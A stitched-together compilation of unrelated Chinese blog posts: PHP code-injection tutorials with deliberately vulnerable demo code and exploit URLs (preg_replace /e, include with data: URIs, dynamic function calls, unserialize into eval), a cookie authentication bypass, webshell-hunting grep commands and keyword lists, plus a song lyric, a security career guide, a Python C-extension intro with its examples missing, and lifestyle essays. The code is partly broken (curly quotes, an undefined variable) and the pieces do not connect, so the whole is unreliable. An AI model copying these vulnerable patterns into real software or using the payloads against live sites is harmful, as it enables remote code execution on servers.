Cookie验证漏洞

<?php
$AdminCookies = $_COOKIE['admin']['name'];
if ($Admin4z1==”){
exit(showmsg(‘账号或密码错误’,2,’index.php’));
}
?>
判断$Admin4z1是否为空 若不为空就登陆成功!!
$Admin4z1的值来源cookies admin[name]的值,修改cookies绕过验证

preg_replace()使用

一 代码执行函数

PHP中可以执行代码的函数。如eval()、assert()、“、system()、exec()、shell_exec()、passthru()、 escapeshellcmd()、pcntl_exec() 等

demo code 1.1:

<?php
echo `dir`;
?>

二 文件包含代码注射

文件包含函数在特定条件下的代码注射，如include()、include_once()、 require()、require_once()。

当allow_url_include=On ，PHP Version>=5.2.0 时，导致代码注射。

demo code 2.1:

<?php
include($_GET['a']);
?>

访问http://127.0.0.1/include.php?a=data:text/plain,%3C?php%20phpinfo%28%29;?%3E 即
执行phpinfo()。

三 正则匹配代码注射

众所周知的preg_replace()函数导致的代码注射。当pattern中存在/e模式修饰符，即允许执行代码。这里我们分三种情况讨论下

3.1 preg_replace() pattern 参数注射

pattern即第一个参数的代码注射。
当magic_quotes_gpc=Off时，导致代码执行。

demo code 3.1:

<?php
echo $regexp = $_GET['reg'];
$var = ‘<php>phpinfo()</php>’;
preg_replace(“/<php>(.*?)$regexp”, ‘\\1′, $var);
?>

访问http://127.0.0.1/preg_replace1.php?reg=%3C\/php%3E/e 即
执行phpinfo()。

3.2 preg_replace() replacement参数注射

replacement即第二个参数的代码注射，导致代码执行。

demo code 3.2:

<?
preg_replace(“/test/e”,$_GET['h'],”jutst test”);
?>

当我们提交 http://127.0.0.1/preg_replace2.php?h=phpinfo() 即
执行phpinfo()。

3.3 preg_replace()第三个参数注射

我们通过构造subject参数执行代码。提交：http://127.0.0.1/preg_replace3.php?h=[php]phpinfo()[/php]

或者 http://127.0.0.1/preg_replace3.php?h=[php]${phpinfo%28%29}[/php] 导致代码执行

demo code 3.3:

<?
preg_replace(“/\s*\[php\](.+?)\[\/php\]\s*/ies”, “\\1″, $_GET['h']);
?>

四 动态代码执行

4.1 动态变量代码执行

demo code 4.1:

<?php
$dyn_func = $_GET['dyn_func'];
$argument = $_GET['argument'];
$dyn_func($argument);
?>

我们提交 http://127.0.0.1/dyn_func.php?dyn_func=system&argument=ipconfig 执行ipconfig命令

4.2 动态函数代码执行

demo code 4.2:
<pre lang=”php” file=”demo42.php” colla=”+”>
<?php
$foobar = $_GET['foobar'];
$dyn_func = create_function(‘$foobar’, “echo $foobar;”);
$dyn_func(”);
?>
</pre>
我们提交 http://127.0.0.1/create_function.php?foobar=system%28dir%29 执行dir命令

五 其他

5.1 ob_start()函数的代码执行

demo code 5.1:
<pre lang=”php” file=”demo51.php” colla=”+”>
<?php
$foobar = ‘system’;
ob_start($foobar);
echo ‘dir’;
ob_end_flush();
?>
</pre>

5.2 array_map()函数的代码执行

demo code 5.2:

<pre lang=”php” file=”demo52.php” colla=”+”>
<?php
$evil_callback = $_GET['callback'];
$some_array = array(0, 1, 2, 3);
$new_array = array_map($evil_callback, $some_array);
?>
</pre>
我们提交 http://127.0.0.1/array_map.php?callback=phpinfo 即执行phpinfo()。

5.3 unserialize()与eval()

unserialize（）是PHP中使用率非常高的函数。不正当使用unserialize（）容易导致安全隐患。
(黑哥那个挑战2 http://hi.baidu.com/hi_heige/blog/item/505b2828da5b18f499250a9b.html)

demo code 5.3:

<pre lang=”php” file=”demo53.php” colla=”+”>
<?php
class Example {
var $var = ”;
function __destruct() {
eval($this->var);
}
}
unserialize($_GET['saved_code']);
?>
</pre>
我们提交 http://127.0.0.1/unserialize.php?saved_code=O:7:%22Example%22:1:{s:3:%22var%22;s:10:%22phpinfo%28%29;%22;} 即执行phpinfo()。

5.4 容易导致安全问题的函数

同类型函数还有很多
array_map()
usort(), uasort(), uksort()
array_filter()
array_reduce()
array_diff_uassoc(), array_diff_ukey()
array_udiff(), array_udiff_assoc(), array_udiff_uassoc()
array_intersect_assoc(), array_intersect_uassoc()
array_uintersect(), array_uintersect_assoc(), array_uintersect_uassoc()
array_walk(), array_walk_recursive()
xml_set_character_data_handler()
xml_set_default_handler()
xml_set_element_handler()
xml_set_end_namespace_decl_handler()
xml_set_external_entity_ref_handler()
xml_set_notation_decl_handler()
xml_set_processing_instruction_handler()
xml_set_start_namespace_decl_handler()
xml_set_unparsed_entity_decl_handler()
stream_filter_register()
set_error_handler()
register_shutdown_function()
register_tick_function()

先讲一下思路，如果服务器上被上传了webshell那么我们肯定能够查到蛛丝马迹，比如php文件的时间，如果我们可以查找最后一次网站代码更新以后的所有php文件，方法如下。

假设最后更新是10天前，我们可以查找10天内生成的可以php文件：

find /var/webroot -name “*.php” -mtime -10

命令说明：
/var/webroot为网站根目录
-name “*.php”为查找所有php文件
-time -10为截止到现在10天

如果文件更新时间不确定，我们可以通过查找关键字的方法来确定。要想查的准确需要熟悉webshell常用的关键字，我这里列出一些常用的，其他的大家可以从网收集一些webshell，总结自己的关键字，括号里面我总结的一些关键字（eval,shell_exec,passthru,popen,system）查找方法如下：

find /var/webroot -name “*.php” |xargs grep “eval” |more
find /var/webroot -name “*.php” |xargs grep “shell_exec” |more
find /var/webroot -name “*.php” |xargs grep “passthru” |more

当然你还可以导出到文件，下载下来慢慢分析：

find /home -name “*.php”|xargs grep “fsockopen”|more >test.log

这里我就不一一罗列了，如果有自己总结的关键字直接替换就可以。当然并不是所有的找出的文件都是webshell需要自己做一下判断，判断的方法也简单，直接从浏览器访问一下这个文件或者和自己找的一些webshell比较一下，看得多了，基本上一眼就可以判断是不是webshell文件。

你的生日让我想起，
一个很久以前的朋友，
那是一个寒冷的冬天，
他流浪在街头，
我以为他要乞求什么，
他却总是摇摇头，
他说今天是他的生日，
却没人祝他生日快乐，
生日快乐
祝你生日快乐
握着我的手，
跟我一起唱这首生日快乐歌乐，
有生的日子天天快乐，
别在意生日怎么过，
这个朋友早已不知下落，
眼前的我有一点失落,
这世界有些人一无所有，
有些人却得到太多，
所以我最亲爱的朋友，
请你珍惜你的拥有,
虽然是一首生日才唱的歌,
愿永远陪在你左右

[漏洞挖掘/安全技术研究员]
研究对象：OS，网络，应用，通讯媒介及协议的安全漏洞和防御方法，偏重于底层技术，对技术要求最高，但不要求很全面，只需精通一两种流行的平台即可。其 研究成果经常为IDS/IPS/Vulnerability Scanner插件作分析等，最新的技术可能被转化到产品中实现商业价值，或可能承担技术最高的一部分专业安全服务。

主要技能：C\C++,ASM,OS kernel，调试器，反汇编、缓冲区溢出类，逻辑编程错误等

[安全产品开发]
和其他程序员一样，只不过是面向安全产品，有核心引擎也有界面开发，如何成为一个优秀的程序员就不用我废话了吧，网上的Proposal多的是

[产品工程师]
作为厂商的技术人员，一般是对自有产品做售后技术支持，如FW，VPN，IDS/IPS，Scanner，AV，AAAA，CF，UTM，SOC， Terminal Management，Vulnerability/Patch Management，Anti-DOS，Anti-Spam……该职位对技术要求一般，有一定的系统、网络基础，可以熟练部署产品即可，另外还有 Testing和Troubleshooting的能力也是比较重要的

[技术顾问/售前工程师]
作为厂商的售前，须对自有的产品和解决方案非常熟悉，售前偏重于架构/方案设计，Presentation,Documentation以及其他 Presale Engineering的能力（如投标、销售推介技能），一般需要多年工作经验，有售后或者研发背景，对特定行业的理解-如曾在电信、金融或者SI的工作 经验能增强竞争力，如能对专业安全技术服务及咨询服务有所掌握，会使你的知识背景更强势，项目管理技能也是必要的。

[安全服务工程师]
个人觉得在安全工程领域，产品选型和部署相对简单，门槛较高的是专业安全服务，先不论当前行业内的安全服务技术人员实际水平如何，我只是就我的理解谈一下 以下职位的技能需求。如渗透测试、安全加固、安全外包/安全监控，应急响应，高级安全技术培训，风险评估等要求技术人员对主流的操作系统平台，网络设备， 数据库，企业应用有一定程度的掌握，并且需要融入对安全和攻防技术的理解，另外安全服务人员最好需要有信息安全管理和项目管理的知识。沟通表达以及文档撰 写能力都是必须的。

[安全架构师]
之前的售前工程师和安全服务工程师也要写整体解决方案，但从专业程度来说，他们还达不到安全架构师的技术高度，安全架构师须熟悉IT基础设施、容灾备份， 大型企业级应用，安全集成，网络设计规划，网络安全产品典型部署，熟悉各种通信标准及协议，需要了解安全趋势和客户的整体安全需求，既有深度又有广度，需 要较多的经验和技术。

[信息安全咨询顾问]
信息安全既有技术也有管理的问题，如传统的Strategy、HR、IT consulting一样，Information Security Consulting也是专业服务中的主要业务，如：Risk Assessment、ISMS building、SOX Compliance……
信息安全不可能脱离企业自身的业务和实际需求，否则便成了空中楼阁，信息安全管理应该是以企业管理为上层引导，信息安全管理为中间支柱，下层以计算机及通信技术为基础依托的三层结构，当然出售的最终产物是三层融合的整体解决方案，咨询顾问一般需要以下技能：
熟悉各类安全标准–BS7799,ISO13335,CC,SSE-CMM,IATF,SP800……
相关的知识领域—IT Governance,ITIL/ITSM,MOF,COBIT,SOA,COSO……
咨询体系–企业经营管理，流程管理，人力资源管理，信息战略，法律法规
基本技能–沟通表达、文档、项目管理
技术体系–All above（不要因为我说了这句话趋之若鹜哦）

[CHO]
这里并不是指人力资源总监，而是传说中的Chief Hacker Officer–首席黑客官，在国外某些公司设有此类职位，是更加纯技术的职位，从名字就可以看出他的技术偏向哪里，实际上应该是安全教科书中的 Whitehat，从Know your enemy的角度讲，反黑的的能力也确实强

[CSO/CISO]
一般只有较大的组织机构才单独设有首席安全官或首席信息安全官，在没有独立设置CSO职位的情况下，信息安全通常属于CIO/CTO/COO考虑的范畴， 实际上也由他们扮演CSO的角色，因此换个角度—信息安全管理咨询应该是in CXO’s perspective，实际上高级咨询顾问到甲方即可成为CSO

通用且有一定竞争力的认证：
CISSP,CISM,CISA,BS7799LA

可供职的厂商：
国内专业安全公司：绿盟科技、启明星辰、天融信、联想网御、安氏
国外安全公司：ISS、Mcafee、Symantec、Checkpoint、TrendMirco
各大IT公司：Microsoft、HP、IBM、Cisco、Juniper、F5、Various vendors
会计事务所：PWC、E&Y、KPMG、DTT……
咨询公司：Accenture
甲方：如电信移动、金融、各大门户、电子商务以及IT系统对内部运营起到关键作用的企业

薪酬：
职位当然是影响Salary的重要因素，除此之外，审计师/咨询顾问、安全架构师和研究员的工资较高，外企的工资一般比国内企业高，在甲方的工资不一定有 乙方高，主要看所在行业、企业盈利程度和对信息安全的重视程度，但乙方高薪职位通常来说比甲方更忙碌，其实质也是用时间换工资，从行为经济学看未必很实 惠。

职业发展路线
研究员-高级安全研究员
开发程序员-项目经理
产品工程师-安全服务工程师-售前技术顾问
产品工程师-安全服务工程师-安全服务项目经理
产品工程师、安全服务工程师、技术顾问有两个发展方向：
1. 偏技术方向—安全架构师
2. 偏管理方向—咨询顾问
甲方和乙方的角色切换，如果对当前的视角失去了兴趣，不妨换个角度，如果结婚了寻求安定不想出差可以去甲方
当然以上只是理论公式，现实生活中的“天花板”在哪里有机会可以自己去体验一下

知识体系结构
大体分为技术体系和管理体系吧
技术体系：
对攻防技术的理解
OS、Network、Application、Data protection and related
TCP/IP protocol suits
研究偏重底层技术，架构偏重网络

安全管理体系：
各种信息安全技术/管理标准，审计及内部控制标准
传统管理学大集合
咨询及审计

其他：
对客户业务的理解
表达沟通，文档，演讲，项目管理和销售技能

Python是一门功能强大的高级脚本语言，它的强大不仅表现在其自身的功能上，而且还表现在其良好的可扩展性上，正因如此，Python已经开始受到越来越多人的青睐，并且被屡屡成功地应用于各类大型软件系统的开发过程中。

与其它普通脚本语言有所不同，Python程序员可以借助Python语言提供的API，使用C或者C++来对Python进行功能性扩展，从而即可以利用Python方便灵活的语法和功能，又可以获得与C或者C++几乎相同的执行性能。执行速度慢是几乎所有脚本语言都具有的共性，也是倍受人们指责的一个重要因素，Python则通过与C语言的有机结合巧妙地解决了这一问题，从而使脚本语言的应用范围得到了很大扩展。

在用Python开发实际软件系统时，很多时候都需要使用C/C++来对Python进行扩展。最常见的情况是目前已经存在一个用C编写的库，需要在Python语言中使用该库的某些功能，此时就可以借助Python提供的扩展功能来实现。此外，由于Python从本质上讲还是一种脚本语言，某些功能用Python实现可能很难满足实际软件系统对执行效率的要求，此时也可以借助Python提供的扩展功能，将这些关键代码段用C或者C++实现，从而提供程序的执行性能。

本文主要介绍Python提供的C语言扩展接口，以及如何使用这些接口和C/C++语言来对Python进行功能性扩展，并辅以具体的实例讲述如何实现Python的功能扩展。

Python是用C语言实现的一种脚本语言，本身具有优良的开放性和可扩展性，并提供了方便灵活的应用程序接口(API)，从而使得C/C++程序员能够在各个级别上对Python解释器的功能进行扩展。在使用C/C++对Python进行功能扩展之前，必须首先掌握Python解释所提供的C语言接口。

2.1 Python对象(PyObject)

Python是一门面向对象的脚本语言，所有的对象在Python解释器中都被表示成PyObject，PyObject结构包含Python对象的所有成员指针，并且对Python对象的类型信息和引用计数进行维护。在进行Python的扩展编程时，一旦要在C或者C++中对Python对象进行处理，就意味着要维护一个PyObject结构。

在Python的C语言扩展接口中，大部分函数都有一个或者多个参数为PyObject指针类型，并且返回值也大都为PyObject指针。

2.2 引用计数

为了简化内存管理，Python通过引用计数机制实现了自动的垃圾回收功能，Python中的每个对象都有一个引用计数，用来计数该对象在不同场所分别被引用了多少次。每当引用一次Python对象，相应的引用计数就增1，每当消毁一次Python对象，则相应的引用就减1，只有当引用计数为零时，才真正从内存中删除Python对象。

下面的例子说明了Python解释器如何利用引用计数来对Pyhon对象进行管理：

在C/C++中处理Python对象时，对引用计数进行正确的维护是一个关键问题，处理不好将很容易产生内存泄漏。Python的C语言接口提供了一些宏来对引用计数进行维护，最常见的是用Py_INCREF()来增加使Python对象的引用计数增1，用Py_DECREF()来使Python对象的引用计数减1。

2.3 数据类型

Python定义了六种数据类型：整型、浮点型、字符串、元组、列表和字典，在使用C语言对Python进行功能扩展时，首先要了解如何在C和Python的数据类型间进行转化。

2.3.1 整型、浮点型和字符串

在Python的C语言扩展中要用到整型、浮点型和字符串这三种数据类型时相对比较简单，只需要知道如何生成和维护它们就可以了。下面的例子给出了如何在C语言中使用Python的这三种数据类型：

2.3.2 元组

Python语言中的元组是一个长度固定的数组，当Python解释器调用C语言扩展中的方法时，所有非关键字(non-keyword)参数都以元组方式进行传递。下面的例子示范了如何在C语言中使用Python的元组类型：

2.3.3 列表

Python语言中的列表是一个长度可变的数组，列表比元组更为灵活，使用列表可以对其存储的Python对象进行随机访问。下面的例子示范了如何在C语言中使用Python的列表类型：

2.3.4 字典

Python语言中的字典是一个根据关键字进行访问的数据类型。下面的例子示范了如何在C语言中使用Python的字典类型：

PyObject* method(PyObject* self, PyObject* args);

攻在于创新，防在于全面。
用计算机的术语来说，攻是个单线程任务，你单核cpu频率越高，则效果愈好。防则是个多线程任务，你cpu核心越多，则效果俞佳。
上面是前言，下面说webshell的查杀

其实和pc一样，如安卓的恶意捆绑木马 和linux的恶意镜像源。一样的道路，web也要过一遍，pc端杀毒也是几个阶段。
从最初的专杀到特征码查杀再到基于行为的查杀（启发式查杀），再到最近炒得火热的云查杀。
说句题外话：所谓的云查杀更像是基于网络的特征码查杀。
同理：服务器上的webshell查杀也需要走特征码的路线，在现在硬件水平高于网络通信带宽的情况下，特征码还是非常必要的，
接下来的就是讲webshell的特征码问题。
依据pc端病毒特征码的原理：根据执行文件如PE文件，从各个段提出多个特征码进行多对一的映射定位（这个主要是为了防止类此myccl之类的过免杀），这种提取的方式有很多种，大部分高效的做法还是经验丰富的病毒分析师凭经验定位特征码。

如PC端病毒特征码类似，但又不尽相同，pc端的病毒是以执行文件存在的，提取特征码只是在机器码-反汇编代码的基础上进行定位的。而webshell是以源码的形式进行定位。机器码是最底层的语言，定的很死，比如我们od中常用的int3 就是0cch一一对应，不会再变。而webshell使用高级脚本语言，高级语言的写法是存在多样性，如php中的各种字符串操作函数，这无疑增加了定位特征码的难度。
其实，现实是这样的对于大马的查杀是相对容易的，无论php，asp,.net的大马，他们中调用的一些函数是普通脚本代码不会用到，所以可以以这些特殊函数为正则匹配规则，进行匹配。（大部分的服务器安全软件也是这样做的）当然这样做的结果，会出现误杀的情况，因此要借用多重特征码进行匹配。一些做免杀的朋友，可能就笑了，这太好过了，直接做下字符串拆分，然后在连接，或者写个加解密，再或者加混淆代码轻松就过了。
这样理论上是对的，但是实际中忽略了电脑硬件的能力，对于2^32的运算一般配置的电脑也不会超过10秒，对于各种字符串加解密我们可以对与加解密运算的字符进行匹配，然后查杀设计要加入语义分析，如果学过编译原理的应该熟悉，对匹配到的字符串加减操作进行还原进行最终的匹配。
对于一句话木马的查杀则比较麻烦，因为变异的一句话木马有些是用的web应用程序正常调用的函数，再加上些变形，查杀是比较棘手，这种查杀则需要进行大量的样本收集，对其进行特征码提取。
特征码的提取可采用统计学中的采样方法，取一定数量的样本（包括正常样本和网马样本），对其进行异样提取，再对各类样本进行同样提取，再通过出现概率在进行添加。最终生成特征码样本。
这样基本对已知存在的一句话木马匹配到。
对于特征码的匹配算法尚在测试中。

欢迎提供更多的webshell样本.

你应该早起早睡，睡前忍住干渴，以免因睡前喝水留下眼袋，因缺少睡眠留下黑眼圈，因不规律睡眠而形容枯槁憔悴。

你应该每天顺手看被大量转发的媒体新闻、小道消息，用你的电子设备订阅一些大家都在订阅的信息源，记住每天出现的新名词，至少让它们在你大脑里留一天。你得学会拿每天奔流不息滔滔逝水的流行语和文体，来开时髦的玩笑。

你应该在一些够有名的地方吃午饭，记住那些店的一些烹饪特色和价格标牌，以便在不经意中透露给他人。

你应该准确把握潮流，拿什么人开玩笑是可以的，拿什么人开玩笑是时兴的，站在什么立场是最安全的，谈什么话题是最高端的。

你应该熟记大量营养搭配，然后划出表格，精确的控制自己的膳食。

你应该多读一些缩减版图解类的二手名著，记住一些基本情节、人物和中心思想；同时买下销量榜单上前十名川流不息走马灯的书，迅速读完序和后记，保证自己能对之侃侃而谈。

你应该时常在健身房确认自己的体重、脂肪含量比、心肺功能。

你应该在网上浩如烟海的交流帖里沙里淘金出一些保养品，然后亦步亦趋外服内敷保重自己的身体。

你应该有一份印满许多显赫国名的护照。

你应该有一份念出来明亮朗澈、音韵铿锵、堂堂正正的职业。

你应该有两门以上可读可写的可靠外语，以及四五门外语的简单会话。你应该国语流利，但也不能在转化家乡话时有任何障碍。

你应该有一份被问到时忽略百万以下数位并歉然答“大概这么多，我也不是很清楚，都交给爸妈了”的收入。

你应该有在校大学生听了都潸然泪下的假期安排和自由度。

你应该持有人们所能想到的一切文凭，而且专业名字应该堂堂正正，不能太拗口。这专业应该让人立刻在脑海里勾勒出灿烂瑰丽的形象，而非“这玩意怎么念，具体是学啥”的好奇心。

你应该毕业于一所让人交头接耳“那地方可不容易进啦”、“我终于见着活的XX大学的大学生啦”的大学。

你应该毕业于一所让人干咽唾沫追问“没花钱就进那地方啦，这么了不起啊”的中学。

你应该有一座书架，排满了你出版的书、你获的奖状、你和某名人不卑不亢握手同时你雄姿英发明显胜出一筹的照片。

你应该具备瞥一眼酒瓶包装就了然于心的红酒知识，口袋里装满整包敬人用的烟，以及一小盒迷你雪茄。

你应该肚里装着五六个随时可以拿出来活跃气氛的笑话。

你应该在适当的年龄结婚，嫁娶一个至少和你等级别的伴侣。对方不可以有婚姻或恋爱史，而且对你千依百顺疼爱有加。

你应该已经在众人称羡的名区买了房子，且不只一处，且没有房贷。孩子哪怕还没生，也应该已经在肚子里酝酿完成只待出世了。孩子的出国留学费用你已存下，而且是用外币账户存的，而非人民币。

你应该从小就聪慧灵巧多才多艺，会钢琴，会书法，琴棋书画诗词歌赋。

你应该从小就乖，阿姨抱也不闹，叔叔一逗就笑。

你应该还在妈肚子里时就从来不惹麻烦，出生都是完美顺产。一出生就红光满面美人/帅哥坯子，被产科医生都惊为天人。

你应该成熟稳重如奢侈品广告里的人们。你谈论一切理想时都该用曾经沧海的切实口吻。对单纯热血的话题表示矜持的兴趣，但要表现出“我已经跨过这一关了”的姿态。

你应该拥有以上这一切，并学会将以上这一切，用不经意、不带侵略性、蜂蜜一样黏稠温柔甘甜的方式，炫耀给人听。

若你不拥有以上这一切，至少你得学个八九不离十，在几天内的几次会面中，表现出这一切。

当这些都准备完之后，你终于变成了一个干净如洗衣粉广告、矜贵如钻石广告、典雅如雪茄广告、健美如运动鞋广告、品位如威士忌广告、成功自信如别墅广告、健康如保健品广告、一路顺风如汽车广告的，从里到外了无瑕疵，人肉移动活广告。

好了，你终于像黄裳写《九阴真经》般修成正果，预先把各家各派所有的武功都破解了。你终于可以打点行装，回家过年去了。去面对你的亲戚、朋友、亲戚的亲戚、朋友的朋友、亲戚的朋友、朋友的亲戚、亲戚的朋友的亲戚、朋友的亲戚的朋友……………………们了。

你将在他们铺天盖地的关怀追问下应付裕如，待他们矛折剑断弹尽粮绝后便会认输，并乐滋滋的给你上封号“别人家的孩子”。然后你父母开怀大乐，觉得脸上有光。你终于在一片啧啧赞叹中飞进了千家万户，变成了“别人家的孩子”。只跟你聊过几句天、只见过你几分钟、只听过你片言只语的亲戚们、亲戚的亲戚们、亲戚的朋友们、亲戚的朋友的亲戚们、亲戚的亲戚的朋友们…………，都会觉得，自己从这占人生0.0001%时间的会面里，通过这些物质标签，已知晓了你辉煌烂漫的一生，于是羡慕着称赞着附和着并自行虚构补完了你其他人生的99.999%，然后回家添油加醋，把你述说成文能安邦武能定国会七十二般变化能腾云驾雾撒豆成兵点石成金一生下来就祥云万道满室异香出一滴汗都是乳香吐一口唾沫都是龙涎香三岁能文七步成诗周游列国不用翻译八分钟环游地球的人，然后对自家孩子说：
“你看看你，再看看人家孩子XXX！”

对你即将或已遇到的99.9999999%的人来说，他们只在乎你在这0.0001%的时间里像不像一个完美的已婚的富裕的彬彬有礼的戴着该戴的手表穿着该穿的衣服去广告宣传的地方旅游长得活像时尚杂志封面的人肉典范活广告，是否够资格成为“别人家孩子”被议论。至于其他99.9999%的时间你在干什么，他们并不在乎。对他们来说，你生在世上，就是为了这个。

作者：张佳玮

在你的生命里，经历了一些很重大的事情，可是你并不知道。

5岁那年，爸爸下班回来，你跑去迎接他，不小心摔了个狗啃泥，不过没有受伤。

你并不知道，就在你摔倒的地方往左两厘米，立着一根小钉子，如果你稍微偏一偏，左眼就失明了。

10岁那年，你一个人在家煮方便面，刚把水壶放到煤气炉上，就接到妈妈的电话让你去姥姥家，你完全忘了开着的煤气炉，锁上门就走了。多么幸运，当壶里的水被烧干了，煤气正好用完了。一场势不可挡的火灾没有发生。

15岁那年，某天晚上，你下了晚自习，像往常那样回家，你肯定没有想到，在刚刚经过的那条小路上，几个小流氓欲拦住你图谋不轨，可是刚好一对夫妻走了过来，坏蛋们一胆怯，放过了你。

25岁那年，你怀着孕，不小心感冒了，去医院打针时粗心的大夫开错了药。当护士拿着会致胎儿畸形的甲硝唑准备给你打时，路过的护士无意间看了一眼，刚走过去又折回来，悄悄提醒那个护士说，孕妇不能用这个药啊。谁也不知道，如果那天药打进去，会是什么结果，反正你是幸运地躲过了厄运。

有那么多次，你都差点掉进悲伤的深渊，可是，你幸运地躲过去了。不得不说，有那么多时候，上苍都眷顾着你，救你于苦海。

如果知道了这些，你还会为了一点小困难小失败小痛苦去埋怨吗？考试的低分，恋人的背叛，身体的伤病……相对那些躲过去的灾难，这些算得了什么？所以，亲爱的，在困难的时候要相信，其实生活对你很眷顾。

当然，在你的生命里，还有一些大事情，你并不知道。

6岁那年，爸爸准备送你去少年宫学习绘画，可是，由于奶奶生病，那个暑假他们没有时间接送你，就把这件事放下了。没有人知道，如果当时得到专业的培训，以你的天赋，就会在这方面取得不凡的成就。

18岁那年，你暗恋已久的男生准备向你表白，信已经写好了，又专门跑到你家楼下小心翼翼地投进信箱。可是他记错了楼号，那封信，被邻居拿到，疑惑了好久之后，给丢掉了。一个男孩，一段青春里最美好的恋情，就这样与你擦肩而过。

24岁那年，你到一家非常好的单位求职，费尽心思终于闯到最后一关，却还是失败了。你并不知道，其实本来你的名字已经在录取的名单里面了，可是，在敲定人选的会议上，一位重量级的评委把你记成另一个表现很差的人，坚定地投了反对票。就这样，别人一个莫名的小失误，让你失去了一份梦寐以求的好工作。

这样的事情，大概还有不少。有那么多次，命运本来已经要改变了，却在最后的关头，因为莫名其妙的偏差，掉转了方向。哦，或许，你的运气实在不怎么样。

所以，亲爱的，当你的彩票中了奖，当你的古董升了值，当你顺利地考上大学又考上了研究生，当你成为单位里最年轻的管理者……不要让自己飘起来，不要轻易地以为自己的运气和实力多么好，要知道，这只是你人生里本来可以发生的美好事情的一部分——还有一部分，你并没有得到。

真的，生活并不完全是你看到的样子，很多大事情你经历了却并不知道。如果你知道了这些，你大概就不会对现在的得与失太在意了。

没错，每个人都不是步步摔跟头的倒霉蛋，更没有人是一帆风顺的命运的宠儿。

看淡那些事情，平静而踏实地经历生活的起落，相信你会生活得更好。